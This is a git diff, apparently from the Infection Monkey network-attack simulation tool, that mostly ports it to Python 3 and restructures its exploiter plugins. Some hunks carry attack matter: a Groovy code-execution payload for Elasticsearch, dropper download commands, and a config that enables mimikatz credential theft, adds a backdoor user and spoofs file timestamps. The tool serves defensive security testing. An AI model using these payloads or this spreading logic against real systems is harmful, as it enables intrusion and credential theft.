class abstractstatic(staticmethod): class abstractstatic(staticmethod):
__slots__ = () __slots__ = ()
def __init__(self, function): def __init__(self, function):
super(abstractstatic, self).__init__(function) super(abstractstatic, self).__init__(function)
function.__isabstractmethod__ = True function.__isabstractmethod__ = True
__isabstractmethod__ = True __isabstractmethod__ = True

View File

@ -12,8 +12,8 @@ class MongoUtils:
@staticmethod @staticmethod
def fix_obj_for_mongo(o): def fix_obj_for_mongo(o):
if type(o) == dict: if isinstance(o, dict):
return dict([(k, MongoUtils.fix_obj_for_mongo(v)) for k, v in o.iteritems()]) return dict([(k, MongoUtils.fix_obj_for_mongo(v)) for k, v in list(o.items())])
elif type(o) in (list, tuple): elif type(o) in (list, tuple):
return [MongoUtils.fix_obj_for_mongo(i) for i in o] return [MongoUtils.fix_obj_for_mongo(i) for i in o]
@ -21,7 +21,7 @@ class MongoUtils:
elif type(o) in (int, float, bool): elif type(o) in (int, float, bool):
return o return o
elif type(o) in (str, unicode): elif isinstance(o, str):
# mongo dosn't like unprintable chars, so we use repr :/ # mongo dosn't like unprintable chars, so we use repr :/
return repr(o) return repr(o)
@ -80,4 +80,3 @@ class MongoUtils:
continue continue
return row return row

View File

@ -1,4 +1,4 @@
import _winreg import winreg
from common.utils.mongo_utils import MongoUtils from common.utils.mongo_utils import MongoUtils
@ -12,11 +12,11 @@ class RegUtils:
pass pass
@staticmethod @staticmethod
def get_reg_key(subkey_path, store=_winreg.HKEY_LOCAL_MACHINE): def get_reg_key(subkey_path, store=winreg.HKEY_LOCAL_MACHINE):
key = _winreg.ConnectRegistry(None, store) key = winreg.ConnectRegistry(None, store)
subkey = _winreg.OpenKey(key, subkey_path) subkey = winreg.OpenKey(key, subkey_path)
d = dict([_winreg.EnumValue(subkey, i)[:2] for i in xrange(_winreg.QueryInfoKey(subkey)[0])]) d = dict([winreg.EnumValue(subkey, i)[:2] for i in range(winreg.QueryInfoKey(subkey)[0])])
d = MongoUtils.fix_obj_for_mongo(d) d = MongoUtils.fix_obj_for_mongo(d)
subkey.Close() subkey.Close()

View File

@ -1,6 +1,6 @@
import wmi import wmi
from mongo_utils import MongoUtils from .mongo_utils import MongoUtils
__author__ = 'maor.rayzin' __author__ = 'maor.rayzin'

25
monkey/common/version.py Normal file
View File

@ -0,0 +1,25 @@
# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for details).
import argparse
from pathlib import Path
MAJOR = "1"
MINOR = "8"
PATCH = "0"
build_file_path = Path(__file__).parent.joinpath("BUILD")
with open(build_file_path, "r") as build_file:
BUILD = build_file.read()
def get_version(build=BUILD):
return f"{MAJOR}.{MINOR}.{PATCH}+{build}"
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str)
args = parser.parse_args()
print(get_version(args.build))
if __name__ == '__main__':
print_version()

View File

@ -1,4 +1,4 @@
import infection_monkey.main from infection_monkey.main import main
if "__main__" == __name__: if "__main__" == __name__:
infection_monkey.main.main() main()

View File

@ -1,2 +1,17 @@
#!/bin/bash #!/bin/bash
# Allow custom build ID
# If the first argument is not empty...
if [[ -n "$1" ]]
then
# Validate argument is a valid build string
if [[ "$1" =~ ^[\da-zA-Z]*$ ]]
then
# And put it in the BUILD file
echo "$1" > ../common/BUILD
else
echo "Build ID $1 invalid!"
fi
fi
pyinstaller -F --log-level=DEBUG --clean monkey.spec pyinstaller -F --log-level=DEBUG --clean monkey.spec

View File

@ -1 +1,12 @@
REM Check if build ID was passed to the build script.
if "%1"=="" GOTO START_BUILD
REM Validate build ID
echo %1|findstr /r "^[0-9a-zA-Z]*$"
if %errorlevel% neq 0 (exit /b %errorlevel%)
REM replace build ID
echo %1> ../common/BUILD
:START_BUILD
pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec

View File

@ -1,12 +1,10 @@
import hashlib import hashlib
import os
import json import json
import os
import sys import sys
import types
import uuid import uuid
from abc import ABCMeta from abc import ABCMeta
from itertools import product from itertools import product
import importlib
__author__ = 'itamar' __author__ = 'itamar'
@ -14,36 +12,24 @@ GUID = str(uuid.getnode())
EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin') EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin')
SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list"] SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list", "exploit_ssh_keys"]
HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden" HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden"
class Configuration(object): class Configuration(object):
def from_kv(self, formatted_data): def from_kv(self, formatted_data):
# now we won't work at <2.7 for sure
network_import = importlib.import_module('infection_monkey.network')
exploit_import = importlib.import_module('infection_monkey.exploit')
unknown_items = [] unknown_items = []
for key, value in formatted_data.items(): for key, value in list(formatted_data.items()):
if key.startswith('_'): if key.startswith('_'):
continue continue
if key in ["name", "id", "current_server"]: if key in ["name", "id", "current_server"]:
continue continue
if self._depth_from_commandline and key == "depth": if self._depth_from_commandline and key == "depth":
continue continue
# handle in cases if hasattr(self, key):
if key == 'finger_classes': setattr(self, key, value)
class_objects = [getattr(network_import, val) for val in value]
setattr(self, key, class_objects)
elif key == 'exploiter_classes':
class_objects = [getattr(exploit_import, val) for val in value]
setattr(self, key, class_objects)
else: else:
if hasattr(self, key): unknown_items.append(key)
setattr(self, key, value)
else:
unknown_items.append(key)
return unknown_items return unknown_items
def from_json(self, json_data): def from_json(self, json_data):
@ -74,7 +60,7 @@ class Configuration(object):
val_type = type(value) val_type = type(value)
if val_type is types.FunctionType or val_type is types.MethodType: if callable(value):
continue continue
if val_type in (type, ABCMeta): if val_type in (type, ABCMeta):
@ -139,6 +125,7 @@ class Configuration(object):
finger_classes = [] finger_classes = []
exploiter_classes = [] exploiter_classes = []
system_info_collectors_classes = []
# how many victims to look for in a single scan iteration # how many victims to look for in a single scan iteration
victims_max_find = 100 victims_max_find = 100
@ -287,7 +274,7 @@ class Configuration(object):
:param sensitive_data: the data to hash. :param sensitive_data: the data to hash.
:return: the hashed data. :return: the hashed data.
""" """
password_hashed = hashlib.sha512(sensitive_data).hexdigest() password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
return password_hashed return password_hashed

View File

@ -9,7 +9,7 @@ from requests.exceptions import ConnectionError
import infection_monkey.monkeyfs as monkeyfs import infection_monkey.monkeyfs as monkeyfs
import infection_monkey.tunnel as tunnel import infection_monkey.tunnel as tunnel
from infection_monkey.config import WormConfiguration, GUID from infection_monkey.config import WormConfiguration, GUID
from infection_monkey.network.info import local_ips, check_internet_access, TIMEOUT from infection_monkey.network.info import local_ips, check_internet_access
from infection_monkey.transport.http import HTTPConnectProxy from infection_monkey.transport.http import HTTPConnectProxy
from infection_monkey.transport.tcp import TcpProxy from infection_monkey.transport.tcp import TcpProxy
@ -53,7 +53,7 @@ class ControlClient(object):
if ControlClient.proxies: if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https') monkey['tunnel'] = ControlClient.proxies.get('https')
requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(monkey), data=json.dumps(monkey),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
@ -76,7 +76,7 @@ class ControlClient(object):
if ControlClient.proxies: if ControlClient.proxies:
debug_message += " through proxies: %s" % ControlClient.proxies debug_message += " through proxies: %s" % ControlClient.proxies
LOG.debug(debug_message) LOG.debug(debug_message)
requests.get("https://%s/api?action=is-up" % (server,), requests.get("https://%s/api?action=is-up" % (server,), # noqa: DUO123
verify=False, verify=False,
proxies=ControlClient.proxies, proxies=ControlClient.proxies,
timeout=TIMEOUT_IN_SECONDS) timeout=TIMEOUT_IN_SECONDS)
@ -85,7 +85,7 @@ class ControlClient(object):
except ConnectionError as exc: except ConnectionError as exc:
current_server = "" current_server = ""
LOG.warn("Error connecting to control server %s: %s", server, exc) LOG.warning("Error connecting to control server %s: %s", server, exc)
if current_server: if current_server:
return True return True
@ -112,14 +112,14 @@ class ControlClient(object):
monkey = {} monkey = {}
if ControlClient.proxies: if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https') monkey['tunnel'] = ControlClient.proxies.get('https')
reply = requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps(monkey), data=json.dumps(monkey),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
return {} return {}
@staticmethod @staticmethod
@ -129,14 +129,14 @@ class ControlClient(object):
return return
try: try:
telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data} telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data}
reply = requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry), data=json.dumps(telemetry),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
@staticmethod @staticmethod
def send_log(log): def send_log(log):
@ -144,27 +144,27 @@ class ControlClient(object):
return return
try: try:
telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)} telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)}
reply = requests.post("https://%s/api/log" % (WormConfiguration.current_server,), requests.post("https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry), data=json.dumps(telemetry),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
@staticmethod @staticmethod
def load_control_config(): def load_control_config():
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
return return
try: try:
reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
return return
try: try:
@ -185,13 +185,13 @@ class ControlClient(object):
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
return return
try: try:
requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps({'config_error': True}), data=json.dumps({'config_error': True}),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", WormConfiguration.current_server, exc) LOG.warning("Error connecting to control server %s: %s", WormConfiguration.current_server, exc)
return {} return {}
@staticmethod @staticmethod
@ -247,7 +247,7 @@ class ControlClient(object):
if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)): if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)):
return dest_file return dest_file
else: else:
download = requests.get("https://%s/api/monkey/download/%s" % download = requests.get("https://%s/api/monkey/download/%s" % # noqa: DUO123
(WormConfiguration.current_server, filename), (WormConfiguration.current_server, filename),
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
@ -261,8 +261,8 @@ class ControlClient(object):
return dest_file return dest_file
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
@staticmethod @staticmethod
def get_monkey_exe_filename_and_size_by_host(host): def get_monkey_exe_filename_and_size_by_host(host):
@ -273,7 +273,7 @@ class ControlClient(object):
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
return None, None return None, None
try: try:
reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,), reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(host_dict), data=json.dumps(host_dict),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, proxies=ControlClient.proxies) verify=False, proxies=ControlClient.proxies)
@ -288,8 +288,8 @@ class ControlClient(object):
return None, None return None, None
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
return None, None return None, None
@ -304,7 +304,7 @@ class ControlClient(object):
try: try:
target_addr, target_port = my_proxy.split(':', 1) target_addr, target_port = my_proxy.split(':', 1)
target_port = int(target_port) target_port = int(target_port)
except: except ValueError:
return None return None
else: else:
proxy_class = HTTPConnectProxy proxy_class = HTTPConnectProxy
@ -315,7 +315,7 @@ class ControlClient(object):
@staticmethod @staticmethod
def get_pba_file(filename): def get_pba_file(filename):
try: try:
return requests.get(PBA_FILE_DOWNLOAD % return requests.get(PBA_FILE_DOWNLOAD % # noqa: DUO123
(WormConfiguration.current_server, filename), (WormConfiguration.current_server, filename),
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)

View File

@ -26,7 +26,8 @@ else:
try: try:
WindowsError WindowsError
except NameError: except NameError:
WindowsError = None # noinspection PyShadowingBuiltins
WindowsError = IOError
__author__ = 'itamar' __author__ = 'itamar'
@ -103,17 +104,17 @@ class MonkeyDrops(object):
dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux
try: try:
ref_stat = os.stat(dropper_date_reference_path) ref_stat = os.stat(dropper_date_reference_path)
except OSError as exc: except OSError:
LOG.warn("Cannot set reference date using '%s', file not found", LOG.warning("Cannot set reference date using '%s', file not found",
dropper_date_reference_path) dropper_date_reference_path)
else: else:
try: try:
os.utime(self._config['destination_path'], os.utime(self._config['destination_path'],
(ref_stat.st_atime, ref_stat.st_mtime)) (ref_stat.st_atime, ref_stat.st_mtime))
except: except OSError:
LOG.warn("Cannot set reference date to destination file") LOG.warning("Cannot set reference date to destination file")
monkey_options =\ monkey_options = \
build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth) build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth)
if OperatingSystem.Windows == SystemInfoCollector.get_os(): if OperatingSystem.Windows == SystemInfoCollector.get_os():
@ -135,7 +136,7 @@ class MonkeyDrops(object):
time.sleep(3) time.sleep(3)
if monkey_process.poll() is not None: if monkey_process.poll() is not None:
LOG.warn("Seems like monkey died too soon") LOG.warning("Seems like monkey died too soon")
def cleanup(self): def cleanup(self):
try: try:

View File

@ -1,107 +1,109 @@
{ {
"should_exploit": true, "should_exploit": true,
"command_servers": [ "command_servers": [
"192.0.2.0:5000" "192.0.2.0:5000"
], ],
"internet_services": [ "internet_services": [
"monkey.guardicore.com", "monkey.guardicore.com",
"www.google.com" "www.google.com"
], ],
"keep_tunnel_open_time": 60, "keep_tunnel_open_time": 60,
"subnet_scan_list": [ "subnet_scan_list": [
], ],
"inaccessible_subnets": [], "inaccessible_subnets": [],
"blocked_ips": [], "blocked_ips": [],
"current_server": "192.0.2.0:5000", "current_server": "192.0.2.0:5000",
"alive": true, "alive": true,
"collect_system_info": true, "collect_system_info": true,
"extract_azure_creds": true, "extract_azure_creds": true,
"should_use_mimikatz": true, "should_use_mimikatz": true,
"depth": 2, "depth": 2,
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll", "dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_date_reference_path_linux": "/bin/sh", "dropper_date_reference_path_linux": "/bin/sh",
"dropper_log_path_windows": "%temp%\\~df1562.tmp", "dropper_log_path_windows": "%temp%\\~df1562.tmp",
"dropper_log_path_linux": "/tmp/user-1562", "dropper_log_path_linux": "/tmp/user-1562",
"dropper_set_date": true, "dropper_set_date": true,
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe", "dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe", "dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_target_path_linux": "/tmp/monkey", "dropper_target_path_linux": "/tmp/monkey",
"monkey_dir_name": "monkey_dir", "monkey_dir_name": "monkey_dir",
"kill_file_path_linux": "/var/run/monkey.not", "kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not", "kill_file_path_windows": "%windir%\\monkey.not",
"dropper_try_move_first": true, "dropper_try_move_first": true,
"exploiter_classes": [ "exploiter_classes": [
"SSHExploiter", "SSHExploiter",
"SmbExploiter", "SmbExploiter",
"WmiExploiter", "WmiExploiter",
"ShellShockExploiter", "ShellShockExploiter",
"ElasticGroovyExploiter", "ElasticGroovyExploiter",
"SambaCryExploiter", "SambaCryExploiter",
"Struts2Exploiter", "Struts2Exploiter",
"WebLogicExploiter", "WebLogicExploiter",
"HadoopExploiter", "HadoopExploiter",
"VSFTPDExploiter" "VSFTPDExploiter",
], "MSSQLExploiter"
"finger_classes": [ ],
"SSHFinger", "finger_classes": [
"PingScanner", "SSHFinger",
"HTTPFinger", "PingScanner",
"SMBFinger", "HTTPFinger",
"MySQLFinger", "SMBFinger",
"MSSQLFingerprint", "MySQLFinger",
"ElasticFinger" "MSSQLFingerprint",
], "ElasticFinger"
"max_iterations": 3, ],
"monkey_log_path_windows": "%temp%\\~df1563.tmp", "max_iterations": 3,
"monkey_log_path_linux": "/tmp/user-1563", "monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true, "monkey_log_path_linux": "/tmp/user-1563",
"ms08_067_exploit_attempts": 5, "send_log_to_server": true,
"user_to_add": "Monkey_IUSER_SUPPORT", "ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!", "user_to_add": "Monkey_IUSER_SUPPORT",
"ping_scan_timeout": 10000, "remote_user_pass": "Password1!",
"smb_download_timeout": 300, "ping_scan_timeout": 10000,
"smb_service_name": "InfectionMonkey", "smb_download_timeout": 300,
"retry_failed_explotation": true, "smb_service_name": "InfectionMonkey",
"self_delete_in_cleanup": true, "retry_failed_explotation": true,
"serialize_config": false, "self_delete_in_cleanup": true,
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", "serialize_config": false,
"skip_exploit_if_file_exist": false, "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
"exploit_user_list": [], "skip_exploit_if_file_exist": false,
"exploit_password_list": [], "exploit_user_list": [],
"exploit_lm_hash_list": [], "exploit_password_list": [],
"exploit_ntlm_hash_list": [], "exploit_lm_hash_list": [],
"exploit_ssh_keys": [], "exploit_ntlm_hash_list": [],
"sambacry_trigger_timeout": 5, "exploit_ssh_keys": [],
"sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"], "sambacry_trigger_timeout": 5,
"sambacry_shares_not_to_check": ["IPC$", "print$"], "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
"local_network_scan": false, "sambacry_shares_not_to_check": ["IPC$", "print$"],
"tcp_scan_get_banner": true, "local_network_scan": false,
"tcp_scan_interval": 0, "tcp_scan_get_banner": true,
"tcp_scan_timeout": 10000, "tcp_scan_interval": 0,
"tcp_target_ports": [ "tcp_scan_timeout": 10000,
22, "tcp_target_ports": [
445, 22,
135, 445,
3389, 135,
80, 3389,
8080, 80,
443, 8080,
3306, 443,
8008, 3306,
9200, 8008,
7001 9200,
], 7001,
"timeout_between_iterations": 10, 8088
"use_file_logging": true, ],
"victims_max_exploit": 15, "timeout_between_iterations": 10,
"victims_max_find": 100, "use_file_logging": true,
"post_breach_actions" : [] "victims_max_exploit": 15,
custom_PBA_linux_cmd = "" "victims_max_find": 100,
custom_PBA_windows_cmd = "" "post_breach_actions": []
PBA_linux_filename = None custom_PBA_linux_cmd = ""
PBA_windows_filename = None custom_PBA_windows_cmd = ""
PBA_linux_filename = None
PBA_windows_filename = None
} }

View File

@ -0,0 +1,98 @@
from abc import abstractmethod
from infection_monkey.config import WormConfiguration
from common.utils.exploit_enum import ExploitType
from datetime import datetime
from infection_monkey.utils.plugins.plugin import Plugin
import infection_monkey.exploit
__author__ = 'itamar'
class HostExploiter(Plugin):
@staticmethod
def should_run(class_name):
"""
Decides if post breach action is enabled in config
:return: True if it needs to be ran, false otherwise
"""
return class_name in WormConfiguration.exploiter_classes
@staticmethod
def base_package_file():
return infection_monkey.exploit.__file__
@staticmethod
def base_package_name():
return infection_monkey.exploit.__package__
_TARGET_OS_TYPE = []
# Usual values are 'vulnerability' or 'brute_force'
EXPLOIT_TYPE = ExploitType.VULNERABILITY
@property
@abstractmethod
def _EXPLOITED_SERVICE(self):
pass
def __init__(self, host):
self._config = WormConfiguration
self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
'started': '',
'finished': '',
'vulnerable_urls': [],
'vulnerable_ports': [],
'executed_cmds': []}
self.exploit_attempts = []
self.host = host
def set_start_time(self):
self.exploit_info['started'] = datetime.now().isoformat()
def set_finish_time(self):
self.exploit_info['finished'] = datetime.now().isoformat()
def is_os_supported(self):
return self.host.os.get('type') in self._TARGET_OS_TYPE
def send_exploit_telemetry(self, result):
from infection_monkey.telemetry.exploit_telem import ExploitTelem
ExploitTelem(self, result).send()
def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
def exploit_host(self):
self.pre_exploit()
try:
result = self._exploit_host()
finally:
self.post_exploit()
return result
def pre_exploit(self):
self.set_start_time()
def post_exploit(self):
self.set_finish_time()
@abstractmethod
def _exploit_host(self):
raise NotImplementedError()
def add_vuln_url(self, url):
self.exploit_info['vulnerable_urls'].append(url)
def add_vuln_port(self, port):
self.exploit_info['vulnerable_ports'].append(port)
def add_executed_cmd(self, cmd):
"""
Appends command to exploiter's info.
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})

View File

@ -1,91 +0,0 @@
from abc import ABCMeta, abstractmethod, abstractproperty
import infection_monkey.config
from common.utils.exploit_enum import ExploitType
from datetime import datetime
__author__ = 'itamar'
class HostExploiter(object):
__metaclass__ = ABCMeta
_TARGET_OS_TYPE = []
# Usual values are 'vulnerability' or 'brute_force'
EXPLOIT_TYPE = ExploitType.VULNERABILITY
@abstractproperty
def _EXPLOITED_SERVICE(self):
pass
def __init__(self, host):
self._config = infection_monkey.config.WormConfiguration
self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
'started': '',
'finished': '',
'vulnerable_urls': [],
'vulnerable_ports': [],
'executed_cmds': []}
self.exploit_attempts = []
self.host = host
def set_start_time(self):
self.exploit_info['started'] = datetime.now().isoformat()
def set_finish_time(self):
self.exploit_info['finished'] = datetime.now().isoformat()
def is_os_supported(self):
return self.host.os.get('type') in self._TARGET_OS_TYPE
def send_exploit_telemetry(self, result):
from infection_monkey.telemetry.exploit_telem import ExploitTelem
ExploitTelem(self, result).send()
def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
def exploit_host(self):
self.pre_exploit()
result = self._exploit_host()
self.post_exploit()
return result
def pre_exploit(self):
self.set_start_time()
def post_exploit(self):
self.set_finish_time()
@abstractmethod
def _exploit_host(self):
raise NotImplementedError()
def add_vuln_url(self, url):
self.exploit_info['vulnerable_urls'].append(url)
def add_vuln_port(self, port):
self.exploit_info['vulnerable_ports'].append(port)
def add_executed_cmd(self, cmd):
"""
Appends command to exploiter's info.
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter
from infection_monkey.exploit.wmiexec import WmiExploiter
from infection_monkey.exploit.smbexec import SmbExploiter
from infection_monkey.exploit.sshexec import SSHExploiter
from infection_monkey.exploit.shellshock import ShellShockExploiter
from infection_monkey.exploit.sambacry import SambaCryExploiter
from infection_monkey.exploit.elasticgroovy import ElasticGroovyExploiter
from infection_monkey.exploit.struts2 import Struts2Exploiter
from infection_monkey.exploit.weblogic import WebLogicExploiter
from infection_monkey.exploit.hadoop import HadoopExploiter
from infection_monkey.exploit.mssqlexec import MSSQLExploiter
from infection_monkey.exploit.vsftpd import VSFTPDExploiter

View File

@ -8,7 +8,7 @@ import json
import logging import logging
import requests import requests
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\ from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX, \
DOWNLOAD_TIMEOUT DOWNLOAD_TIMEOUT
from infection_monkey.network.elasticfinger import ES_PORT from infection_monkey.network.elasticfinger import ES_PORT
from common.data.network_consts import ES_SERVICE from common.data.network_consts import ES_SERVICE
@ -26,8 +26,8 @@ class ElasticGroovyExploiter(WebRCE):
# attack URLs # attack URLs
MONKEY_RESULT_FIELD = "monkey_result" MONKEY_RESULT_FIELD = "monkey_result"
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
JAVA_CMD = GENERIC_QUERY \ JAVA_CMD = \
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
_TARGET_OS_TYPE = ['linux', 'windows'] _TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Elastic search' _EXPLOITED_SERVICE = 'Elastic search'
@ -39,7 +39,7 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
exploit_config['dropper'] = True exploit_config['dropper'] = True
exploit_config['url_extensions'] = ['_search?pretty'] exploit_config['url_extensions'] = ['_search?pretty']
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX +" " + BITSADMIN_CMDLINE_HTTP} exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP}
return exploit_config return exploit_config
def get_open_service_ports(self, port_list, names): def get_open_service_ports(self, port_list, names):
@ -83,7 +83,7 @@ class ElasticGroovyExploiter(WebRCE):
# Overridden web_rce method that adds CMD prefix for windows command # Overridden web_rce method that adds CMD prefix for windows command
try: try:
if 'windows' in self.host.os['type']: if 'windows' in self.host.os['type']:
resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND) resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
else: else:
resp = self.exploit(url, CHECK_COMMAND) resp = self.exploit(url, CHECK_COMMAND)
if resp is True: if resp is True:

View File

@ -59,7 +59,7 @@ class HadoopExploiter(WebRCE):
resp = json.loads(resp.content) resp = json.loads(resp.content)
app_id = resp['application-id'] app_id = resp['application-id']
# Create a random name for our application in YARN # Create a random name for our application in YARN
rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in xrange(self.RAN_STR_LEN)]) rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)])
payload = self.build_payload(app_id, rand_name, command) payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload) resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload)
return resp.status_code == 202 return resp.status_code == 202

View File

@ -6,19 +6,17 @@ from time import sleep
import pymssql import pymssql
from common.utils.exploit_enum import ExploitType from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
